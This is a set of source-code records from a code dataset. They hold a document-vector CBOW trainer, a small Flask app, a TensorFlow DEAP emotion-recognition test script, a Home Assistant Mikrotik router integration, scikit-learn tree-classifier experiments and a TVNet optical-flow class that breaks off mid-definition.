doc_vec_table\n    global word_vec_table\n    # word (unit) vector table\n    word_vec_table = np.random.uniform(0, 1, layer_size * unit_num).reshape(unit_num, layer_size)\n    # parameter table; the parameter count, i.e. the number of internal nodes, is the number of leaves (unit_num) - 1, initialized from a normal distribution\n    para_table = np.random.normal(0.0, 1, layer_size * (unit_num - 1)).reshape(unit_num - 1, layer_size)\n    # document vector table\n    doc_vec_table = np.random.uniform(0, 1, layer_size * doc_num).reshape(doc_num, layer_size)\n\n    # map from the key of words, docs to index of vector table\n    index = 0\n    for word in words_tree.keys():\n        word_index[word] = index\n        index += 1\n    index = 0\n    for doc in docs.keys():\n        doc_index[doc] = index\n        index += 1\n\n\ndef sigmoid(x):\n    return 1 / (1 + math.exp(-x))\n\n\ndef normalize(vec):\n    average, std = np.average(vec), np.std(vec)\n    return (vec - average) / std\n\n\n# show message of the training process\ndef show_message():\n    def by_similar(word_s):\n        return word_s[1]\n    # check for similar\n    num = 0\n    words = ['will', 'to', 'like', 'good', 'eight', 'or', 'dog', 'movie']\n    for word in words:\n        if word not in words_tree:\n            continue\n        vec = word_vec_table[word_index[word]]\n        similar = []\n        for other in words_tree.keys():\n            other_vec = word_vec_table[word_index[other]]\n            similar.append((other, np.dot(vec, other_vec)))\n        similar_sorted = sorted(similar, key=by_similar, reverse=True)\n        print(word, ':', list(map(lambda x: x[0], similar_sorted[0:10])))\n        num += 1\n        if num > 10:\n            break\n\n\n# train the document identified by doc_key\ndef DV_Enhanced_CBOW(doc_key):\n\n    sent = docs[doc_key][0].split('\t') # document (only the first one is used): the sequence of places the user visited\n    sent_len = len(sent)\n\n    # start train\n    for pos in range(sent_len):\n        neul = np.zeros(layer_size) # hidden layer\n        neule = np.zeros(layer_size) # accumulated change of the hidden layer\n\n        word = sent[pos] # place id string\n        if word not in words_tree: # skip words that are not in the vocabulary\n            continue\n\n        # sum up the context vectors\n        # first add this document's vector, which does not depend on pos\n        neul += doc_vec_table[doc_index[doc_key]]\n        num = random.randint(0, window) # random start offset, not strictly from 0\n        start = num\n        while start < 2 * window + 1:\n            cur_pos = pos - window + start\n            # the context words exclude the current word;\n            # also skip positions outside the sentence range, and ignore ''\n            if start == window or cur_pos < 0 or cur_pos >= sent_len or sent[cur_pos] == '':\n                start += 1\n                continue\n            # sum up the context vectors\n            neul += word_vec_table[word_index[sent[cur_pos]]]\n            start += 1\n\n        # hierarchical softmax along the Huffman tree\n        word_in_tree = words_tree[word] # current place\n        points = word_in_tree['points']\n        codes = word_in_tree['codes']\n        codes_len = len(codes)\n        for layer_index in range(codes_len):\n            # dot product\n            dot = np.dot(neul, para_table[points[layer_index]])\n            # drop the update if the dot product is out of range\n            if dot > MAX_EXP or dot < -MAX_EXP:\n                continue\n            # sigmoid\n            dot = sigmoid(dot)\n            # shared factor of the partial derivatives * learning rate alpha\n            g = (1 - codes[layer_index] - dot) * start_alpha\n\n            # back-propagate the updates\n            # first update the hidden layer\n            neule += g * para_table[points[layer_index]]\n            # then update the parameters\n            para_table[points[layer_index]] += g * neul\n            # normalize\n            para_table[points[layer_index]] = normalize(para_table[points[layer_index]])\n\n        # update the doc vector\n        doc_vec_index = doc_index[doc_key]\n        doc_vec_table[doc_vec_index] += neule\n        # normalize\n        doc_vec_table[doc_vec_index] = normalize(doc_vec_table[doc_vec_index])\n        # propagate the update to the word vectors\n        start = num\n        while start < 2 * window + 1:\n            cur_pos = pos - window + start\n            # the context words exclude the current word;\n            # also skip positions outside the sentence range, and ignore ''\n            if start == window or cur_pos < 0 or cur_pos >= sent_len or sent[cur_pos] == '':\n                start += 1\n                continue\n            # update the word vector\n            vec_index = word_index[sent[cur_pos]]\n            word_vec_table[vec_index] += neule\n            # normalize the word vector\n            word_vec_table[vec_index] = normalize(word_vec_table[vec_index])\n            start += 1\n\n    # report progress and elapsed time\n    global train_num\n    train_num += 1\n    if train_num % 500 == 0:\n        print('Iteration: ', train_num, ',time: ', (datetime.datetime.now() - start_time).seconds, 's')\n        show_message()\n\n\ndef ndarray_to_json(ndarr):\n    ret = []\n    for vec in ndarr:\n        ret.append(list(map(lambda x: float(x), list(vec))))\n    return json.dumps(ret)\n\n\n# test\nif __name__ == '__main__':\n    init_data('data/movielen/handled/doc.txt', 'data/movielen/handled/tree.txt')\n    init_basic_parameter(layer_size, window, start_alpha, MAX_EXP)\n    for iter_num in range(40):\n        for doc_key in docs.keys():\n            DV_Enhanced_CBOW(doc_key)\n    # output vec\n    word = open('data/movielen/vector/word_vec.txt', 'w')\n    doc = open('data/movielen/vector/doc_vec.txt', 'w')\n    word.write(ndarray_to_json(word_vec_table))\n    doc.write(ndarray_to_json(doc_vec_table))\n    word.close()\n    doc.close()\n","sub_path":"codes/PMDV/CBOW_DV.py","file_name":"CBOW_DV.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"347038140","text":"from flask import Flask\napp = Flask(__name__)\napp.config['DEBUG'] = True\n\n# Note: We don't need to call run() since our application is embedded within\n# the App Engine WSGI application server.\n\n\nform=\"\"\"
\n\t<form action=\"/testform\">\n <input type=\"text\" name=\"q\">\n\t</form>
\n\"\"\"\n@app.route('/')\ndef hello():\n    \"\"\"Return a friendly HTTP greeting.\"\"\"\n    return form\n    \n#@app.route('/testform')\n#def get(self):\n#    q = self.request.get(\"q\")\n#    return q\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    \"\"\"Return a custom 404 error.\"\"\"\n    return 'Sorry, nothing at this URL.', 404\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"425300683","text":"# coding:utf-8\nimport time\nimport tensorflow as tf\nfrom input_data import readFile, data_reshape_test\nimport deap_forward\nimport deap_backward\nimport numpy as np\n\ntest_num_examples = 10 # number of test examples\nTEST_INTERVAL_SECS = 5 # seconds to wait between checks for the latest model\n\n\ndef test(signal_re, labels_re):\n\n    # create a default graph and run the following ops inside it (mostly the same as in train)\n    with tf.Graph().as_default() as g: \n        x = tf.placeholder(tf.float32, [\n            test_num_examples,\n            deap_forward.IMAGE_SIZE_X,\n            deap_forward.IMAGE_SIZE_Y,\n            deap_forward.NUM_CHANNELS]) \n        y_ = tf.placeholder(tf.float32, [None, deap_forward.OUTPUT_NODE]) # ??\n        y = deap_forward.forward(x, False, None) # ??\n\n        ema = tf.train.ExponentialMovingAverage(deap_backward.MOVING_AVERAGE_DECAY)\n        ema_restore = ema.variables_to_restore()\n        saver = tf.train.Saver(ema_restore)\n\n        # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # check whether the prediction equals the ground truth\n        # correct_prediction = (abs(y-y_) < 0.5) # whether prediction and ground truth differ by less than 0.5\n        # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # average to get the accuracy\n\n        while True:\n            with tf.Session() as sess:\n                ckpt = tf.train.get_checkpoint_state(deap_backward.MODEL_SAVE_PATH)\n                if ckpt and ckpt.model_checkpoint_path:\n                    saver.restore(sess, ckpt.model_checkpoint_path)\n\n                    # parse from the checkpoint file name how many iterations the saved model was trained for\n                    global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1] \n                    reshaped_x = np.reshape(signal_re, (\n                        test_num_examples,\n                        deap_forward.IMAGE_SIZE_X,\n                        deap_forward.IMAGE_SIZE_Y,\n                        deap_forward.NUM_CHANNELS))\n                    # compute the accuracy on the test set\n                    pred_labels = sess.run(y, feed_dict={x: reshaped_x})\n                    y_ = labels_re\n                    pred_correct_V = 0\n                    pred_correct_A = 0\n                    pred_correct_D = 0\n                    pred_correct_L = 0\n                    for i in range(test_num_examples):\n                        print(\"-------------separator-----------\") # debug output\n                        for j in range(4):\n                            print(pred_labels[i][j]) # debug output\n                            print(y_[i][j]) # debug output\n                            print(\"-----------\")\n                            if pred_labels[i][j] >= 0.5:\n                                pred_labels[i][j] = 1\n                            else:\n                                pred_labels[i][j] = 0\n                            if pred_labels[i][j] == y_[i][j] and j == 0:\n                                pred_correct_V += 1\n                            if pred_labels[i][j] == y_[i][j] and j == 1:\n                                pred_correct_A += 1\n                            if pred_labels[i][j] == y_[i][j] and j == 2:\n                                pred_correct_D += 1\n                            if pred_labels[i][j] == y_[i][j] and j == 3:\n                                pred_correct_L += 1\n                    Recognition_rate_V = pred_correct_V/test_num_examples\n                    Recognition_rate_A = pred_correct_A / test_num_examples\n                    Recognition_rate_D = pred_correct_D / test_num_examples\n                    Recognition_rate_L = pred_correct_L / test_num_examples\n                    # pred_labels = np.asarray(reshaped_x)\n                    # print(pred_labels) # debug output\n                    print(\"----------separator----------\") # debug output\n                    # print(labels_re) # debug output\n                    print(\"After {0} training step(s), test accuracy V = {1} ,test accuracy A = {2}, \"\n                          \"test accuracy D = {3} ,test accuracy L = {4}\".format(global_step, Recognition_rate_V,\n                                                                                Recognition_rate_A,\n                                                                                Recognition_rate_D,\n                                                                                Recognition_rate_L))\n                else:\n                    print('No checkpoint file found')\n                    return\n            time.sleep(TEST_INTERVAL_SECS) # check for a newer model every TEST_INTERVAL_SECS seconds\n\n\ndef main():\n    signal_data, signal_labels = 
readFile('F:/情感计算/数据集/DEAP/s02.mat')\n signal_re, labels_re = data_reshape_test(signal_data, signal_labels)\n test(signal_re, labels_re)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CNN/CNN_DEAP_1.2/deap_test.py","file_name":"deap_test.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"105130223","text":"\"\"\"Mikrotik Router integration.\"\"\"\r\n\r\nimport logging\r\nfrom homeassistant.exceptions import ConfigEntryNotReady\r\nfrom homeassistant.const import (\r\n CONF_NAME,\r\n CONF_HOST,\r\n CONF_PORT,\r\n CONF_USERNAME,\r\n CONF_PASSWORD,\r\n CONF_SSL,\r\n)\r\n\r\nfrom .mikrotik_controller import MikrotikControllerData\r\n\r\nfrom .const import (\r\n DOMAIN,\r\n DATA_CLIENT,\r\n)\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\n\r\n# ---------------------------\r\n# async_setup\r\n# ---------------------------\r\nasync def async_setup(hass, _config):\r\n \"\"\"Set up configured Mikrotik Controller.\"\"\"\r\n hass.data[DOMAIN] = {}\r\n hass.data[DOMAIN][DATA_CLIENT] = {}\r\n return True\r\n\r\n\r\n# ---------------------------\r\n# async_setup_entry\r\n# ---------------------------\r\nasync def async_setup_entry(hass, config_entry):\r\n \"\"\"Set up Mikrotik Router as config entry.\"\"\"\r\n name = config_entry.data[CONF_NAME]\r\n host = config_entry.data[CONF_HOST]\r\n port = config_entry.data[CONF_PORT]\r\n username = config_entry.data[CONF_USERNAME]\r\n password = config_entry.data[CONF_PASSWORD]\r\n use_ssl = config_entry.data[CONF_SSL]\r\n\r\n mikrotik_controller = MikrotikControllerData(hass, config_entry, name, host, port, username, password, use_ssl)\r\n await mikrotik_controller.hwinfo_update()\r\n await mikrotik_controller.async_update()\r\n\r\n if not mikrotik_controller.data:\r\n raise ConfigEntryNotReady()\r\n\r\n hass.data[DOMAIN][DATA_CLIENT][config_entry.entry_id] = mikrotik_controller\r\n\r\n hass.async_create_task(\r\n hass.config_entries.async_forward_entry_setup(config_entry, \"sensor\")\r\n )\r\n\r\n hass.async_create_task(\r\n hass.config_entries.async_forward_entry_setup(config_entry, \"binary_sensor\")\r\n )\r\n\r\n hass.async_create_task(\r\n hass.config_entries.async_forward_entry_setup(config_entry, \"device_tracker\")\r\n )\r\n\r\n hass.async_create_task(\r\n hass.config_entries.async_forward_entry_setup(config_entry, \"switch\")\r\n )\r\n\r\n device_registry = await hass.helpers.device_registry.async_get_registry()\r\n device_registry.async_get_or_create(\r\n config_entry_id=config_entry.entry_id,\r\n manufacturer=mikrotik_controller.data['resource']['platform'],\r\n model=mikrotik_controller.data['routerboard']['model'],\r\n name=mikrotik_controller.data['routerboard']['model'],\r\n sw_version=mikrotik_controller.data['resource']['version'],\r\n )\r\n\r\n return True\r\n\r\n\r\n# ---------------------------\r\n# async_unload_entry\r\n# ---------------------------\r\nasync def async_unload_entry(hass, config_entry):\r\n \"\"\"Unload a config entry.\"\"\"\r\n mikrotik_controller = hass.data[DOMAIN][DATA_CLIENT][config_entry.entry_id]\r\n await hass.config_entries.async_forward_entry_unload(config_entry, \"sensor\")\r\n await hass.config_entries.async_forward_entry_unload(config_entry, \"binary_sensor\")\r\n await hass.config_entries.async_forward_entry_unload(config_entry, \"device_tracker\")\r\n await hass.config_entries.async_forward_entry_unload(config_entry, \"switch\")\r\n await mikrotik_controller.async_reset()\r\n 
hass.data[DOMAIN][DATA_CLIENT].pop(config_entry.entry_id)\r\n    return True\r\n","sub_path":"custom_components/mikrotik_router/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"61107518","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing, tree\nfrom sklearn.model_selection import KFold,train_test_split, GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, AdaBoostClassifier\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\npath = \"data/income.csv\" ##change this to your path\n\ntest_size = 0.15\nN_FOLDS = 3\nMIN_DEPTH = 2\nMIN_FEATURES = 6\nMAX_DEPTH = 5\nMAX_FEATURES = 10\nrandom_state = 100\n\n##choose which function to call\nshow = \"con\" ##{\"baseline\",\"single\",\"random\",\"gb\",\"ada\",\"con\"}\n\ndef load_and_preprocess_data(path):\n    ##read csv and define columns\n    names_list = [\"age\", \"workclass\", \"education\", \"education-num\", \"martial-status\", \"occupation\", \"relationship\",\n                  \"race\",\n                  \"sex\", \"capital-gain\", \"capital-loss\", \"hours-per-week\", \"native-country\", \"income\"]\n\n    df = pd.read_csv(path, header=None)\n    df.columns = names_list\n    print(df.head())\n    print(\"rows: \" + str(df.shape[0]))\n    print(\"columns: \" + str(df.shape[1]))\n\n    ##transforms labels to 1/0 and drops the income column\n    y = df[\"income\"].apply(lambda x: 0 if x == \" <=50K\" else 1)\n    df = df.drop(columns=[\"income\"])\n    print(\"number of examples above 50K: \" + str(y.sum()))\n    print(\"number of examples below 50K: \" + str(df.shape[0] - y.sum()))\n\n    ##transforms all labels in dataframe to numeric\n    for c in df.columns:\n        if df[c].dtype == 'object':\n            lbl = preprocessing.LabelEncoder()\n            lbl.fit(list(df[c].values))\n            df[c] = lbl.transform(list(df[c].values))\n\n    ##checks no values are NaN, so we don't need to deal with them\n    assert (np.sum(df.isnull().sum(axis=0)) == 0)\n\n    features = df\n\n    features_train, features_test, y_train, y_test = train_test_split(features.values,\n                                                                      y.values,\n                                                                      test_size=test_size,\n                                                                      random_state=random_state)\n    return features_train, features_test, y_train, y_test\n\n\n# baseline\ndef baseline_acc(features_train, features_test, y_train, y_test):\n    \"\"\"\n    defines a simple baseline - always predict 1 on the test set\n    :param features_train: train features vector\n    :param features_test: test features vector\n    :param y_train: train labels\n    :param y_test: test labels\n    \"\"\"\n    y = np.concatenate((y_train, y_test))\n    features = np.concatenate((features_train, features_test))\n    kf = KFold(n_splits=N_FOLDS)\n    total_acc = []\n    for train_index, test_index in kf.split(features):\n        y_train, y_test = y[train_index], y[test_index]\n        test_baseline = np.ones(len(test_index))\n        acc = np.mean(np.abs(test_baseline - y_test))\n        total_acc.append(acc)\n    baseline_mean_acc = sum(total_acc) / len(total_acc) * 100\n    print(\"baseline accuracy: \" + str(baseline_mean_acc))\n    # baseline accuracy: 75.91904694533844\n\n\n# single tree\ndef single_tree_acc(features_train, features_test, y_train, y_test):\n    \"\"\"\n    performs single decision tree accuracy test\n    :param features_train: train features vector\n    :param features_test: test features vector\n    :param y_train: train labels\n    :param y_test: test labels\n    \"\"\"\n\n    param_dist = {'max_depth': range(MIN_DEPTH, MAX_DEPTH + 1),\n                  'max_features': range(MIN_FEATURES, MAX_FEATURES + 1),\n                  
'criterion': ['gini', 'entropy']}\n tree_model = tree.DecisionTreeClassifier(random_state=random_state)\n\n cv = GridSearchCV(tree_model, cv=N_FOLDS,\n param_grid=param_dist,\n n_jobs=-1)\n cv.fit(features_train, y_train)\n print(\"best params:\")\n print(cv.best_params_)\n tree_model.set_params(criterion=cv.best_params_['criterion'],\n max_depth=cv.best_params_['max_depth'],\n max_features=cv.best_params_['max_features'])\n print(\"Decision Tree accuracy\")\n tree_model.fit(X=features_train, y=y_train)\n acc = tree_model.score(X=features_test, y=y_test) * 100\n print(acc)\n # best params:\n # {'criterion': 'gini', 'max_depth': 9, 'max_features': 7}\n # Decision Tree accuracy\n # 85.42476970317297\n\n\ndef random_forest_acc(features_train, features_test, y_train, y_test):\n \"\"\"\n performs random forest accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n param_dist = {'max_depth': range(MIN_DEPTH, MAX_DEPTH + 1),\n 'max_features': range(MIN_FEATURES, MAX_FEATURES + 1)}\n random_forest_model = RandomForestClassifier(n_estimators=100,\n min_samples_leaf=8,\n n_jobs=-1,\n random_state=random_state)\n cv = GridSearchCV(random_forest_model, cv=N_FOLDS,\n param_grid=param_dist,\n n_jobs=-1, verbose=5)\n cv.fit(features_train, y_train)\n print(\"best params:\")\n print(cv.best_params_)\n random_forest_model.set_params(max_depth=cv.best_params_['max_depth'],\n max_features=cv.best_params_['max_features'])\n print(\"Random Forest accuracy\")\n random_forest_model.fit(X=features_train, y=y_train)\n acc = random_forest_model.score(X=features_test, y=y_test) * 100\n print(acc)\n # best params:\n # {'max_depth': 12, 'max_features': 10}\n # Random Forest accuracy\n # 86.85772773797339\n\n\ndef gradient_boosting_acc(features_train, features_test, y_train, y_test):\n \"\"\"\n performs gradient boosting accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n learning_rate = 0.8\n param_dist = {'max_depth': range(MIN_DEPTH, MAX_DEPTH + 1),\n 'max_features': range(MIN_FEATURES, MAX_FEATURES + 1)}\n gb_tree = GradientBoostingClassifier(n_estimators=50,\n min_samples_leaf=8,\n learning_rate=learning_rate,\n random_state=random_state)\n cv = GridSearchCV(gb_tree, cv=N_FOLDS,\n param_grid=param_dist,\n n_jobs=-1, verbose=5)\n cv.fit(features_train, y_train)\n print(\"best params:\")\n print(cv.best_params_)\n gb_tree.set_params(max_depth=cv.best_params_['max_depth'],\n max_features=cv.best_params_['max_features'])\n print(\"Gradient Boost accuracy\")\n gb_tree.fit(X=features_train, y=y_train)\n acc = gb_tree.score(X=features_test, y=y_test) * 100\n print(acc)\n # best params:\n # {'max_depth': 3, 'max_features': 8}\n # Gradient Boost accuracy\n # 87.34902763561925\n\n\ndef ada_boosting_acc(features_train, features_test, y_train, y_test):\n \"\"\"\n performs adaptive boosting accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n learning_rates = np.arange(0.1, 0.22, 0.02)\n # algorithms = ['SAMME', 'SAMME.R']\n param_dist = {'learning_rate': list(learning_rates)}\n\n tree_model = tree.DecisionTreeClassifier(random_state=random_state,\n criterion='gini',\n max_depth=9,\n max_features=7)\n\n ada_tree = AdaBoostClassifier(base_estimator=tree_model,\n 
n_estimators=50,\n random_state=random_state,\n algorithm='SAMME')\n\n cv = GridSearchCV(ada_tree, cv=N_FOLDS,\n param_grid=param_dist,\n n_jobs=-1, verbose=5)\n\n cv.fit(features_train, y_train)\n\n print(\"best params:\")\n print(cv.best_params_)\n ada_tree.set_params(learning_rate=cv.best_params_['learning_rate'])\n print(\"Adaptive Boost accuracy\")\n ada_tree.fit(X=features_train, y=y_train)\n acc = ada_tree.score(X=features_test, y=y_test) * 100\n print(acc)\n # best params:\n # {'learning_rate': 0.18000000000000002}\n # Adaptive Boost accuracy\n # 87.34902763561925\n\n\ndef draw_confusion_mat(features_train, features_test, y_train, y_test):\n \"\"\"\n draws confusion matrices for each configuration\n performs single decision tree accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n tree_model = tree.DecisionTreeClassifier(random_state=random_state,\n criterion='gini',\n max_depth=9,\n max_features=7)\n\n random_forest_model = RandomForestClassifier(n_estimators=100,\n min_samples_leaf=8,\n n_jobs=-1,\n max_depth=12,\n max_features=10,\n random_state=random_state)\n\n gb_tree = GradientBoostingClassifier(n_estimators=50,\n min_samples_leaf=8,\n learning_rate=0.8,\n random_state=random_state,\n max_depth=3,\n max_features=8)\n\n ada_tree = AdaBoostClassifier(base_estimator=tree_model,\n learning_rate=0.18,\n n_estimators=50,\n random_state=random_state,\n algorithm='SAMME')\n models = [tree_model,random_forest_model,gb_tree,ada_tree]\n models_names = [\"Decision Tree\",\"Random Forest\",\"Gradient Boost\",\"Adaptive Boosting\"]\n labels = [\"below 50K\",\"above 50K\"]\n cmap = \"YlGnBu\"\n for model_name,model in zip(models_names,models):\n model.fit(X=features_train,y=y_train)\n predictions = model.predict(X=features_test)\n conf_mat = confusion_matrix(predictions,y_test)\n conf_mat = conf_mat.astype(float) / np.sum(conf_mat)\n sns.heatmap(conf_mat, annot=True, fmt='f', cbar=False,cmap=cmap,yticklabels=labels,xticklabels=labels)\n plt.xlabel('Actual Values')\n plt.ylabel('Predicted Values')\n plt.title('Predicted vs. Actual Confusion Matrix for ' + model_name + ' model')\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n\n features_train, features_test, y_train, y_test = load_and_preprocess_data(path)\n if show == \"baseline\":\n baseline_acc(features_train, features_test, y_train, y_test)\n elif show == \"single\":\n single_tree_acc(features_train, features_test, y_train, y_test)\n elif show == \"random\":\n random_forest_acc(features_train, features_test, y_train, y_test)\n elif show == \"gb\":\n gradient_boosting_acc(features_train, features_test, y_train, y_test)\n elif show == \"ada\":\n ada_boosting_acc(features_train, features_test, y_train, y_test)\n else:\n draw_confusion_mat(features_train, features_test, y_train, y_test)\n","sub_path":"algorithms/trees/Solution/ClassifiersTrees.py","file_name":"ClassifiersTrees.py","file_ext":"py","file_size_in_byte":11822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"343048814","text":"import numpy as np\nimport tensorflow as tf\nimport spatial_transformer\n\n\nclass TVNet(object):\n GRAD_IS_ZERO = 1e-12\n\n def __init__(self):\n pass\n\n def grey_scale_image(self, x):\n assert len(x.shape) == 4\n assert x.shape[-1].value == 3, 'number of channels must be 3 (i.e. 
RGB)'\n\n ker_init = tf.constant_initializer([[0.114], [0.587], [0.299]])\n grey_x = tf.layers.conv2d(x, 1, [1, 1], padding='same',\n kernel_initializer=ker_init, use_bias=False, trainable=False)\n\n return tf.floor(grey_x)\n\n def normalize_images(self, x1, x2):\n reduction_axes = [i for i in xrange(1, len(x1.shape))]\n min_x1 = tf.reduce_min(x1, axis=reduction_axes)\n max_x1 = tf.reduce_max(x1, axis=reduction_axes)\n\n min_x2 = tf.reduce_min(x2, axis=reduction_axes)\n max_x2 = tf.reduce_max(x2, axis=reduction_axes)\n\n min_val = tf.minimum(min_x1, min_x2)\n max_val = tf.maximum(max_x1, max_x2)\n\n den = max_val - min_val\n\n expand_dims = [-1 if i == 0 else 1 for i in xrange(len(x1.shape))]\n min_val_ex = tf.reshape(min_val, expand_dims)\n den_ex = tf.reshape(den, expand_dims)\n\n x1_norm = tf.where(den > 0, 255. * (x1 - min_val_ex) / den_ex, x1)\n x2_norm = tf.where(den > 0, 255. * (x2 - min_val_ex) / den_ex, x2)\n\n return x1_norm, x2_norm\n\n def gaussian_smooth(self, x):\n assert len(x.shape) == 4\n ker_init = tf.constant_initializer([[0.000874, 0.006976, 0.01386, 0.006976, 0.000874],\n [0.006976, 0.0557, 0.110656, 0.0557, 0.006976],\n [0.01386, 0.110656, 0.219833, 0.110656, 0.01386],\n [0.006976, 0.0557, 0.110656, 0.0557, 0.006976],\n [0.000874, 0.006976, 0.01386, 0.006976, 0.000874]])\n smooth_x = tf.layers.conv2d(x, x.shape[-1].value, [5, 5], padding='same',\n kernel_initializer=ker_init, use_bias=False, trainable=False)\n\n return smooth_x\n\n def warp_image(self, x, u, v):\n assert len(x.shape) == 4\n assert len(u.shape) == 3\n assert len(v.shape) == 3\n u = u / x.shape[2].value * 2\n v = v / x.shape[1].value * 2\n\n delta = tf.concat(axis=1, values=[u, v])\n return spatial_transformer.transformer(x, delta, (x.shape[-3].value, x.shape[-2].value))\n\n def centered_gradient(self, x, name):\n assert len(x.shape) == 4\n\n with tf.variable_scope('centered_gradient'):\n x_ker_init = tf.constant_initializer([[-0.5, 0, 0.5]])\n diff_x = tf.layers.conv2d(x, x.shape[-1].value, [1, 3], padding='same',\n kernel_initializer=x_ker_init, use_bias=False, name=name + '_diff_x',\n trainable=False)\n\n y_ker_init = tf.constant_initializer([[-0.5], [0], [0.5]])\n diff_y = tf.layers.conv2d(x, x.shape[-1].value, [3, 1], padding='same',\n kernel_initializer=y_ker_init, use_bias=False, name=name + '_diff_y',\n trainable=False)\n\n # refine the boundary\n first_col = 0.5 * (tf.slice(x, [0, 0, 1, 0], [-1, x.shape[1].value, 1, x.shape[3].value]) -\n tf.slice(x, [0, 0, 0, 0], [-1, x.shape[1].value, 1, x.shape[3].value]))\n\n last_col = 0.5 * (\n tf.slice(x, [0, 0, x.shape[2].value - 1, 0], [-1, x.shape[1].value, 1, x.shape[3].value]) -\n tf.slice(x, [0, 0, x.shape[2].value - 2, 0], [-1, x.shape[1].value, 1, x.shape[3].value]))\n diff_x_valid = tf.slice(diff_x, begin=[0, 0, 1, 0],\n size=[-1, x.shape[1].value, x.shape[2].value - 2, x.shape[3].value])\n diff_x = tf.concat(axis=2, values=[first_col, diff_x_valid, last_col])\n\n first_row = 0.5 * (tf.slice(x, [0, 1, 0, 0], [-1, 1, x.shape[2].value, x.shape[3].value]) -\n tf.slice(x, [0, 0, 0, 0], [-1, 1, x.shape[2].value, x.shape[3].value]))\n last_row = 0.5 * (\n tf.slice(x, [0, x.shape[1].value - 1, 0, 0], [-1, 1, x.shape[2].value, x.shape[3].value]) -\n tf.slice(x, [0, x.shape[1].value - 2, 0, 0], [-1, 1, x.shape[2].value, x.shape[3].value]))\n diff_y_valid = tf.slice(diff_y, begin=[0, 1, 0, 0],\n size=[-1, x.shape[1].value - 2, x.shape[2].value, x.shape[3].value])\n diff_y = tf.concat(axis=1, values=[first_row, diff_y_valid, last_row])\n\n return diff_x, 
diff_y\n\n def forward_gradient(self, x, name):\n assert len(x.shape) == 4\n\n with tf.variable_scope('forward_gradient'):\n x_ker_init = tf.constant_initializer([[-1, 1]])\n diff_x = tf.layers.conv2d(x, x.shape[-1].value, [1, 2], padding='same',\n kernel_initializer=x_ker_init, use_bias=False, name=name + '_diff_x',\n trainable=True)\n\n y_ker_init = tf.constant_initializer([[-1], [1]])\n diff_y = tf.layers.conv2d(x, x.shape[-1].value, [2, 1], padding='same',\n kernel_initializer=y_ker_init, use_bias=False, name=name + '_diff_y',\n trainable=True)\n\n # refine the boundary\n diff_x_valid = tf.slice(diff_x, begin=[0, 0, 0, 0],\n size=[-1, x.shape[1].value, x.shape[2].value - 1, x.shape[3].value])\n last_col = tf.zeros([tf.shape(x)[0], x.shape[1].value, 1, x.shape[3].value], dtype=tf.float32)\n diff_x = tf.concat(axis=2, values=[diff_x_valid, last_col])\n\n diff_y_valid = tf.slice(diff_y, begin=[0, 0, 0, 0],\n size=[-1, x.shape[1].value - 1, x.shape[2].value, x.shape[3].value])\n last_row = tf.zeros([tf.shape(x)[0], 1, x.shape[2].value, x.shape[3].value], dtype=tf.float32)\n diff_y = tf.concat(axis=1, values=[diff_y_valid, last_row])\n\n return diff_x, diff_y\n\n def divergence(self, x, y, name):\n assert len(x.shape) == 4\n\n with tf.variable_scope('divergence'):\n x_valid = tf.slice(x, begin=[0, 0, 0, 0],\n size=[-1, x.shape[1].value, x.shape[2].value - 1, x.shape[3].value])\n first_col = tf.zeros([tf.shape(x)[0], x.shape[1].value, 1, x.shape[3].value], dtype=tf.float32)\n x_pad = tf.concat(axis=2, values=[first_col, x_valid])\n\n y_valid = tf.slice(y, begin=[0, 0, 0, 0],\n size=[-1, y.shape[1].value - 1, y.shape[2].value, y.shape[3].value])\n first_row = tf.zeros([tf.shape(y)[0], 1, y.shape[2].value, y.shape[3].value], dtype=tf.float32)\n y_pad = tf.concat(axis=1, values=[first_row, y_valid])\n\n x_ker_init = tf.constant_initializer([[-1, 1]])\n diff_x = tf.layers.conv2d(x_pad, x.shape[-1].value, [1, 2], padding='same',\n kernel_initializer=x_ker_init, use_bias=False, name=name + '_diff_x',\n trainable=True)\n\n y_ker_init = tf.constant_initializer([[-1], [1]])\n diff_y = tf.layers.conv2d(y_pad, y.shape[-1].value, [2, 1], padding='same',\n kernel_initializer=y_ker_init, use_bias=False, name=name + '_diff_y',\n trainable=True)\n\n div = diff_x + diff_y\n return div\n\n def zoom_size(self, height, width, factor):\n new_height = int(float(height) * factor + 0.5)\n new_width = int(float(width) * factor + 0.5)\n\n return new_height, new_width\n\n def zoom_image(self, x, new_height, new_width):\n assert len(x.shape) == 4\n\n delta = tf.zeros((tf.shape(x)[0], 2, new_height * new_width))\n zoomed_x = spatial_transformer.transformer(x, delta, (new_height, new_width))\n return tf.reshape(zoomed_x, [tf.shape(x)[0], new_height, new_width, x.shape[-1].value])\n\n def dual_tvl1_optic_flow(self, x1, x2, u1, u2,\n tau=0.25, # time step\n 